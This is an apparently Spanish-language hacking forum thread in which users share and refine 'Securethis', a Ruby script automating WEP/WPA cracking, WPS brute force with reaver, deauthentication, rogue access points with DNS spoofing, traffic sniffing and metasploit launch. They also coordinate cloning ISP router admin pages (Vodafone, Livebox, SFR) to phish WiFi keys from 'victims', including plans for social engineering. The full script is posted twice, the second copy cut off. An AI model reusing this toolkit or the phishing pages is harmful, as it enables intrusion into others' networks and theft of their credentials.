      menu.choice(:Quit, "Quitter le prog.") { exit }
    end
  end
end

Recuerda a todos que quieren usa el script que hay que installar las dependancias de ruby (A ver en la primera pahina de este thema)


Si algo esta de accuerdo para ayudar me a terminar las clonadas pahinas lo haré con plazer :)
Autro proyecto mas duro que tengo en la cabeza es de cambiar el functionamento del WPS en hostapd para que el cliente se connecta a nosotros in entrar la contrasena pero aqui no es lla thema.

 
Título: Re:Securethis V1.0
Publicado por: kcdtv en Noviembre 10, 2013, 10:32:34 am
Hola Koala  ;)
las tele-operadoras que puedes encontrar de "los dos lados de los pirineos" son Vodafone , Orange  y la difunta ( o sigue viva ? )  Tele2
Me parece haber visto algo acerca de numéricable que se lanzaba.
Las livebox de AGEM fueron muy utilizadas aquí y la pagina es igual que para las francesas, traduciendo el contenido.
Desgraciadamente ya no tengo de estos cacharos....

Bouygues, Free, SFR, Neuf, Darty, y Alice    no están presente en el mercado ibérico directamente.
Al contrario tendrás aquí a routers puestos en servicio por las tele-operadoras Jazztell, OnO, Telefonica a escalal nacional y tienes empresas mas "locales", implementadas en ciertas regiones, como EUSKATEL en el país vasco.
 
Los mamones de orange y vodafone están por todas parte....
A ellos si que les ha venido bien el € y el mercado común europeo; y la crisis.... no conocen...  :P

 
Título: Re:Securethis V1.0
Publicado por: koala63 en Noviembre 10, 2013, 17:27:33 pm
De verdad que mientras estamos trabajando como dieus para tener dinero, ellos se comen hidalgo y champagne y todo eso para vender a los mas caro possible redes que hacen hacer en tunisia (para sfr o china para une parte de las livebox de orange).


Por eso hay qu hacer la resistencia !  ;)

Título: Re:Securethis V1.0
Publicado por: maripuri en Noviembre 10, 2013, 17:47:55 pm
Cita de: kcdtv
y la difunta ( o sigue viva ? )  Tele2
Tele2 pertenece ahora a Vodafone

koala63 un saludo, me alegro de leerte..   ;)
Título: Re:Securethis V1.0
Publicado por: kcdtv en Noviembre 10, 2013, 18:07:48 pm
Citar
Tele2 pertenece ahora a Vodafone

Me repito, estos mamones estan  por todas parte ...  :P 

en Espana la pagina de administración vodafone tiene esta pinta ahorita

(http://i.imm.io/1kkJe.png)

es gracioso lo de "configuración de " seguridad optima" teniendo el WPS activado por defecto  :P
Título: Re:Securethis V1.0
Publicado por: koala63 en Noviembre 10, 2013, 19:19:19 pm
mmh se puede hacer rapido eso con un poco de css
Título: Re:Securethis V1.0
Publicado por: kcdtv en Noviembre 10, 2013, 19:41:43 pm
si quieres los códigos fuentes de las paginas o algo, solo preguntas...
Título: Re:Securethis V1.0
Publicado por: koala63 en Noviembre 10, 2013, 19:56:47 pm
Si, envia me el vodafone por favor ;)
Título: Re:Securethis V1.0
Publicado por: kcdtv en Noviembre 10, 2013, 20:26:16 pm
esto es el codigo fuente de la primera pagina

Código: [Seleccionar]
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Inicio</title>
<link rel="stylesheet" type="text/css" title="Style" href="../css/main.css" />
<script type="text/javascript" src="../js/main.js"></script>
<script type="text/javascript" src="../js/utils.js"></script>
<script type="text/javascript" src="../js/menu.js"></script>
<script type="text/javascript">if(window.navigator.userAgent.indexOf("MSIE")>=1){document.execCommand("BackgroundImageCache", false, true);}</script>
</head>
<body id="top">
<div id="global">
<div id="header">
<div class="logo">
<div class="logo_home"><a href="index.htm" ><img src="../img/header/logo.gif" border="0" alt="home" /></a></div>
<div class="language"><strong><a href="../en_US/index.htm" id = "langlink" onclick = "changelang(0, 0);">English</a> | Español</strong></div>
</div>
</div>
<div id="container">
<div id="nav">
<script type="text/javascript">ImportMenu_es('');</script>
</div>

<div id="content" class="home">
<div class="content_bl">
<div class="content_tl">
<div class="content_tr">
<div class="content_cnr">
<div class="content_main">
<div class="intro">
<p class="intro">Bienvenido la <span class="title">interfaz de configuración</span></p>
<p>El Equipo está configurado para proporcionar un rendimiento y una seguridad óptimos.<br />También puede conectar al Equipo diversos accesorios, que se podrán compartir entre<br />varios ordenadores y tendrán acceso a Internet.
</p>
</div>
  <table class="line std_Vmargin">
<tr>
<td class="txt_l">
<div class="box size_Home_1on3" style="background:none; border:1px solid #CCCCCC;">
<div class=""><div class=""><div class=""><div class="">
<h3 class="box_hd box_item" ><span>Equipo</span></h3>
<div class="box_main">
<img src="../img/pictures/home_configurationbox.jpg" alt="Box configuration " />
<ul class="link_list">
<li><a href="statut_services.html">Estado del servicio: comprobar el estado de los servicios (conexión a Internet, WiFi, telefonía fija )</a></li>
<li><a href="config_appli.html">Aplicaciones: autorizar a mis juegos y aplicaciones para que funcionen en la  red</a></li>
<script type="text/javascript">
<!--
var pwdLevel = '<%ejGet(userLevel)%>';
if ( pwdLevel != '1' )
{
document.writeln('<li><a href="config_wifi.html">WiFi: administrar mi conexión inalámbrica </a></li>');
}
-->
</script>
<li class="last"><a href="config_routeur_expert.htm">Router: administrar parámetros avanzados del Equipo </a></li>
</ul>
</div>
</div></div></div></div>
</div>
</td>
<td class="txt_c">
<div class="box size_Home_1on3 middle"  style="background:none; border:1px solid #CCCCCC;">
<div class=""><div class=""><div class=""><div class="">
<h3 class="box_hd homenetwork_item"><span>Red local</span></h3>
<div class="box_main">
<img src="../img/pictures/home_accessoiresbox.jpg" alt="Home Network" />
<ul class="link_list">
<li><a href="equipements_raccordes.html">Dispositivos conectados: ver los dispositivos conectados al Equipo</a></li>
</ul>
</div>
</div></div></div></div>
</div>
</td>
<td class="txt_r">
<div class="box size_Home_1on3 floatr"  style="background:none; border:1px solid #CCCCCC;">
<div class=""><div class=""><div class=""><div class="">
<h3 class="box_hd support_item" ><span>Soporte técnico</span></h3>
<div class="box_main">
<img src="../img/pictures/home_assistance.jpg" alt="Support" />
<ul class="link_list">
<li><a href="diagnostic.html">Solución de problemas: acceso a la solución de problemas relacionados con el equipo de manera integral.</a></li>
</ul>
</div>
</div></div></div></div>
</div>
</td>
</tr>
</table>
</div>
</div>
</div>
</div>
</div>
</div>

<div class="clearing"></div>
</div>
</div>
</body>
</html>

Tal cual cuando hago "view page source" con el iceweasel


tienes estos elementos graficos
(http://i.imm.io/1klrC.png)

te los he puesto en este fichero > http://ubuntuone.com/1o5IXFWcc8PNZOy2X8RgFq algunos son blancos, los fondos, no sabia si te hacia falta para historias de dimensiones

quieres algo mas?
 
Título: Re:Securethis V1.0
Publicado por: koala63 en Noviembre 10, 2013, 22:11:45 pm
Muchas gracias :) ya me vale con eso  8)
Título: Re:Securethis V1.0
Publicado por: kcdtv en Noviembre 10, 2013, 23:54:25 pm
Gracias a ti maestro  ;)
Título: Re:Securethis V1.0
Publicado por: koala63 en Noviembre 11, 2013, 20:23:15 pm
Hola :)

@Kcdtv, un amigo a podido dar me por la semana una Livebox y una Bbox, he podido hacer un "dump" de las paginas de configuracion y soy rehaciendo todas las paginas finalemente  ;)


Si puedes hacer un dump de vodafone para mi (los CSS y JS del codigo de la pagina wifi), ya te haré una muy bonita pagina  :P si no puedes, no problemo me arerglaré con lo que tengo :)

He hecho Livebox y Sfr hoy y voy a intentar de poner una shoutbox para la ayuda a la victima en todas la paginas clonadas.
Título: Re:Securethis V1.0
Publicado por: ñanduti en Noviembre 11, 2013, 20:58:28 pm
este script no rula en kali y en wifislax ??? solo en ubuntu no ::) un salu2
Título: Re:Securethis V1.0
Publicado por: kcdtv en Noviembre 11, 2013, 21:44:01 pm
En kali debería funcionar ya que es debian based como ubuntu.
Citar
Si puedes hacer un dump de vodafone para mi (los CSS y JS del codigo de la pagina wifi)
Entendido, te mirare esto   ;)

Citar
He hecho Livebox y Sfr hoy y voy a intentar de poner una shoutbox para la ayuda a la victima en todas la paginas clonadas.

ahi te veo puliendo los detalles  ;)
Título: Re:Securethis V1.0
Publicado por: ñanduti en Noviembre 11, 2013, 22:12:51 pm
copio el scrip en un portapapeles le doy permisos y cual  seria el comando correcto en kali seria asi no  bash ruby Securethis.rb.sh  un salu2
Título: Re:Securethis V1.0
Publicado por: kcdtv en Noviembre 11, 2013, 23:53:55 pm
noOOOooooo°°°  ;D

Si es un script escrito en bash con extensión .sh lo llamas con bash.
ejemplo
Código: [Seleccionar]
bash WPSPIN.sh
En este caso este escrito en ruby con extensión .rb así que lo llamas con su interprete - el lenguaje con el cual fue escrito - ruby
Código: [Seleccionar]
ruby Securethis.rb
Y si le pones una doble extensión, .rb y .sh seguro que no ira fino  ;)


Título: Re:Securethis V1.0
Publicado por: koala63 en Diciembre 02, 2013, 12:43:43 pm
Hola :)


Es una noticia para todos que tienen una red espagnola, si podeis ir a la pagina de administration wifi y hacer un "dump" del codigo, haré bonitas falsas paginas ;)

Hay una commanda en linux para hacer eso pero como no la uso muhas veces le olvidao... Pero bueno, me necessito el codigo de la pagina, los css y js y todos lo que esta escrito en el codigo de esta forma:

Código: [Seleccionar]
<link rel="stylesheet" type="text/css" href="http://admin/css/style.css" /> y los "js" tambien.


Asi no hay mucho trabajo a hacer y la pagina estara muy bonita, he hecho igual para el foro crack-wifi y las falsas estan parecido a noventa porciento a las real  8)

Avisa me por el MP si tienes lo que soy diciendo --(No respondré a otra cosa en privado que este sujete, para usar el script todo esta escrito aqui)--

Un saludo :)
Título: Re:Securethis V1.0
Publicado por: A5Te1aRp@QDa7ei en Diciembre 03, 2013, 23:43:10 pm
Hola :)

No tengo mucho tiempo para hacer pahinas clonadas PERO voy a dar la spahinas que he hecho yo y a ver si uno me ayuda a terminar bien todo eso.Son pahinas para red en Francia pero hay Orange y bouygues y sfr (vodafone en espana ? )


Hay mas cosas a hacer en esas pahinas porque como no tengo mucho tiempo no estan completa, ejemplo:

-1   La ayuda en linea con una shoutbox para hablar directamente con la victima tienne necessidad de ayuda.
-2    Espaso privado con un autra pahina que pide los codigos para tener un acesso en la configuration de la box a distancia o hacer el "social engeneering" llamando la hotline para buscar mas information.
-3    Cambiar la imagen "aide.jpg" (las colores y el escrito Livebox-1234)
-4    Hacer nuevo codigo CSS mas facil y mejor para que los nuevos pueden apprender y cambiar cosas a dentro.

NO se NECESSITA usar wireshark con esas pahinas, quatro linea de PHP mas y un nuevo txt se hace cuando el usario entra su llave  wifi ;)


Ahora el link de las pahinas:

http://uptobox.com/pa7a1hghj4b5

Y el Securethis.rb que uso en unbutu 12.04LTS (no se necessita de descargar lo si tiennes una version antérior o igual que unbutu 10.04)

Código: [Seleccionar]
#!/usr/bin/env ruby
# encoding: utf-8

require "rubygems"
require "highline/import"

puts "Make a good choice with airodump and press ctrl+c for next step"
sleep 10
system ("airmon-ng start wlan0")
sleep 5
system ("airodump-ng mon0")

def wepinj
system ("ifconfig")
      puts "Now choose your MAC adress and press enter, warning to write as well the adress!"
mac=""
mac=gets.chomp
$mac=mac

puts "Le scan de reseau va se lancer, choisissez votre reseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wep --ignore-negative-one mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} --ignore-negative-one mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} --ignore-negative-one mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} --ignore-negative-one mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")
end

def wepp
system ("ifconfig")
      puts "Now choose your MAC adress and press enter, warning to write as well the adress!"
mac=""
mac=gets.chomp
$mac=mac

puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wep --ignore-negative-one mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} --ignore-negative-one mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} --ignore-negative-one mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} --ignore-negative-one mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")
end

def wpadico
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa --ignore-negative-one mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Rentrez l'adresse de la personne connecte au reseau (STATION)"
station=""
station=gets.chomp
$station=station


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} --ignore-negative-one mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -0 150 -a #{$bssid} -c #{$station} --ignore-negative-one mon0 &> /dev/null &")
sleep 148
puts "Entrez le nom du dico a utiliser"
dico=""
dico=gets.chomp
$dico=dico

system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -w #{$dico} #{$nom}.cap &> /dev/null &")
end

def wparlocal
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa --ignore-negative-one mon0")
     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch


     puts "Creation de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null`
`iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1`
`iptables -P FORWARD ACCEPT`
`iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80`
     puts "Regles iptables effectues, redemarrage de dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "Mise en place de apache et dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
     puts "lancement de wireshark, ITS NOT NECESSARY close it if you have a php script in your fake page"
sleep 6
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
end

def wparinternet
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa --ignore-negative-one mon0")
     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch


     puts "Creation de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE`
     puts "Regles iptables effectues, redemarrage de dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "Mise en place de apache et dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
sleep 3
puts "lancement de wireshark, ITS NOT NECESSARY close it if you have a php script in your fake page"
sleep 6
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
end

def wps
puts("Reaver with ten seconds between two request on the acces point.WARNING if reaver is not installed yet in the system you have to go here: http://www.linuxtrack.com/t1427-Installer-Reaver-sur-Ubuntu.htm  and follow the instructions")
sleep 20

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e reaver -i mon0 #{$bssid} -d 10 -vv &> /dev/null &")
end

def sergio
puts("MAKE SURE THE FORWADING IS ENABLED (echo 1 > /proc/sys/net/ipv4/ip_forward)   Sergio is a powerful proxy open source and easy to use for capture any traffic in the web! for more information and download go to https://code.google.com/p/sergio-proxy/ special thanks to Antares145 and his tuto, can be found here: http://antaresnotebook.wordpress.com/2013/03/31/tuto-rogue-ap-episode-2-sniffing-de-base-et-un-peu-de-fun/")
sleep 40
system ("ifconfig")
     puts "Enter your ip adress"
ip=""
ip=gets.chomp
ip=ip

`iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to #{$ip}:10000`
Dir.chdir '/root/sergio/sergio-proxy'
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e ./sergio-proxy.py -l 10000 -w /tmp/log.txt &> /dev/null &")
end

def hostapd
  puts("Hostapd access point mode, good to do a MITM more discreet (make sure your hostapd.conf has got a good configuration and the way to the folder is correct. to begin, remove the line driver=hostapd and replace it with driver=nl80211)")
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e hostapd /etc/hostapd/hostapd.conf &> /dev/null &")
end

def deauth
  system ("ifconfig")
  puts("choose your network card to do the deauth (press enter if you want to use the same card as the rogue AP)")
carte=""
carte=gets.chomp
$carte=carte

system ("airmon-ng start #{$carte}")
sleep 6
system ("airodump-ng --encrypt wpa --ignore-negative-one mon0")
puts("enter the channel of the target network (CH)")
canal=""
canal=gets.chomp
$canal=canal

puts("enter the adress of the target network (BSSID)")
bssid=""
bssid=gets.chomp
$bssid=bssid

puts("enter the name of the file capture in airodump")
name=""
name=gets.chomp
$name=name

system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng --#{$canal} --#{$essid} --output-format csv -w #{$name} mon0 &> /dev/null &")
sleep 5
system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airdrop-ng -i mon0 -t #{$name}.csv -r /root/rules.txt -b -p &> /dev/null &")
end

def planque
  puts "Airbase can find a hidden network too, you have to wait a little and the network will appear in your airodump-ng windows"
sleep 15
system("airodump-ng --encrypt wpa mon0")
puts "Select the channel of the target network (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Select the bssid of the target network (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

system("airodump-ng -c #{$ch} --bssid #{$bssid} mon0")

     puts "Rogue access point with parameters of the hidden network is in active mode, see airodump and wait for the name of this network"
sleep 10
system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -a #{$bssid} -X mon0 &> /dev/null &")
end

def metasploit
    puts "BEFORE Lauching metasploit if you are on unbutu or other linux plateform make sure you have all the librairies to run properly metasploit.Lauching msfconsole, this could take a time...wait.Come back to Securethis menu pressing exit in msfconsole"
sleep 20
system("msfconsole")
end

def clean
    puts "Remove your index.html and php and all css present into /var/www and replace with the new files you choose CTRL+C TO ABORT NOW!"
sleep 20
`rm /var/www/index.php`
`rm /var/www/index.html`
`rm /var/www/valid.php`
`rm /var/www/*.css`
`rm /var/www/*.jpg`
`rm /var/www/*.ico`

puts "Now enter the name of your folder wich countain the fakes pages"
name=""
name=gets.chomp
$name=name

Dir.chdir '/root'
`cp -rv #{$name} /var/www`
end

def settings
  puts "CHECK and EDIT: Important file needed for a good crack"
sleep 10
`gedit /etc/dhcp3/dhcpd.conf`
`gedit /root/dns.txt`
`gedit /etc/hostapd/hostapd.conf`
`gedit /root/rules.txt`
`gedit /var/log/apache2/access.log`
`gedit /var/log/apache2/error.log`
end

begin
  puts
  loop do
    choose do |menu|
      menu.prompt = "Please select option"
  puts "##################    Coded By Flow (Koala)              #################"
  puts "##################    Securethis V1.1                    #################"
  puts "                  #########################                   "
  puts "                        #############                         "
  puts "                            #####                             "
  puts "                              #                               "
  puts "~~~Does your network is secure?~~~                            "
 
      menu.choice(:Wepinjection, "injection.") { wepinj() }
      menu.choice(:Wepp0841, "-p0841.") { wepp() }
      menu.choice(:Wpabruteforce, "attaque de bruteforce.") { wpadico() }
      menu.choice(:RogueAPlocal, "Rogue sin internet.") { wparlocal() }
      menu.choice(:RogueAPinternet, "Rogue con internet.") { wparinternet() }
      menu.choice(:ReaverWPS, "Reaver.") { wps() }
      menu.choice(:Sniffing, "Usando de Sergio proxy.") { sergio() }
      menu.choice(:Hostapd, "Hostapd.") { hostapd() }   
      menu.choice(:DeauthAttack, "airdrop-ng.") { deauth() }
      menu.choice(:HiddenNetwork, "red escondido.") { planque() }
      menu.choice(:Metasploit, "lancamiento de msfconsole.") { metasploit() }
      menu.choice(:CleanApache2WARNING, "Limpiar su apache") { clean() }
      menu.choice(:Settings, "Caja de outilla.") { settings() }
      menu.choice(:Quit, "Quitter le prog.") { exit }
    end
  end
end

Recuerda a todos que quieren usa el script que hay que installar las dependancias de ruby (A ver en la primera pahina de este thema)


Si algo esta de accuerdo para ayudar me a terminar las clonadas pahinas lo haré con plazer :)
Autro proyecto mas duro que tengo en la cabeza es de cambiar el functionamento del WPS en hostapd para que el cliente se connecta a nosotros in entrar la contrasena pero aqui no es lla thema.






Hola Koala y kcdtv,

Seriais tan amables de actualizar el 1er post con las actualizaciones?
Otra es si koala puedes usar otro server menos odioso que ese que gastas.

He leido todo los mensajes pero es un desastre a la hora de entregar el ruby y los HTML.

Gracias


P.s. Incapaz de descargar este zip :
http://uptobox.com/pa7a1hghj4b5
Título: Re:Securethis V1.0
Publicado por: kcdtv en Diciembre 04, 2013, 00:04:03 am
sera porque usas ad blocker o algo similar...  ???

(http://img12..us/img12/4279/5nvx.png)

yo ya no modifico nada de nadie ya que no soy mas moderador de este foro  ;)   
Creo que Koala se pasara en breve...  ;)
Título: Re:Securethis V1.0
Publicado por: maripuri en Diciembre 04, 2013, 00:09:06 am

(http://img96.xooimage.com/files/7/e/a/sshot-2013-12-04--00-07-03--428553e.jpg)



La descarga rula bien..  tiene que ser lo que te dice kcdtv o algo similar  ¿has probado con otro navegador?
Título: Re:Securethis V1.0
Publicado por: koala63 en Diciembre 04, 2013, 00:58:29 am
Hola :)


Para las falsas paginas mejor poner esas:

http://uptobox.com/pwhhypdiqxzs

Estan hecha desde la ultima semana y mas bonita que las otras, tiennes la livebox a dentro  8)

Para el script Securethis, un membro de un otro foro me ha volvido errores, cuando et actulizado el script he puesto una nueva dependencia a dentro y he olvidado de decir lo para la instalation... :-\

Ahora un poco de explicacion para que todo el mundo comprende.

2 cosas, si useis unbutu 10.04 o otras hay que installar eso antes de enpezar algo:

Código: [Seleccionar]
sudo apt-get install ruby
sudo apt-get install rubygems1.8
sudo apt-get install rubygems1.9.1
sudo apt-get install libgtk2-ruby1.8
sudo gem install highline

En seguida el install.rb para el servidor dhcp, apache etc...

Código: [Seleccionar]
#!/usr/bin/env ruby
# encoding: utf-8

puts "this script will install the dependancies needed for Securethis, just be carreful on the shell ask Y for yes and n for no, the time of the installation depend to your connection speed and the engine of your computer, you can change the time between any installation using nano, gedit or mousepad when you see a sleep line into the script..."
sleep 60
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install dsniff &> /dev/null &")
      sleep 60
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install wireshark &> /dev/null &")
      sleep 90
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo apt-get install dhcp3-server &> /dev/null &")
      sleep 90
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo apt-get install apache2 &> /dev/null &")
      sleep 150
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install libapache2-mod-php5 &> /dev/null &")
`sudo a2enmod php5`
`sudo service apache2 restart`
`sudo a2enmod php5`
`sudo service apache2 restart`
`sudo gem install --no-rdoc --no-ri highline`

se lanca asi:
Código: [Seleccionar]
ruby install.rb  (checkear que esta executable en la propriedad)

Y despuès el script Securethis.rb

Código: [Seleccionar]
#!/usr/bin/env ruby
# encoding: utf-8

require "rubygems"
require "highline/import"

puts "Make a good choice with airodump and press ctrl+c for next step"
sleep 10
system ("airmon-ng start wlan0")
sleep 5
system ("airodump-ng mon0")

def wepinj
system ("ifconfig")
      puts "Now choose your MAC adress and press enter, warning to write as well the adress!"
mac=""
mac=gets.chomp
$mac=mac

puts "Le scan de reseau va se lancer, choisissez votre reseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wep mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")
end

def wepp
system ("ifconfig")
      puts "Now choose your MAC adress and press enter, warning to write as well the adress!"
mac=""
mac=gets.chomp
$mac=mac

puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wep mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")
end

def wpadico
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Rentrez l'adresse de la personne connecte au reseau (STATION)"
station=""
station=gets.chomp
$station=station


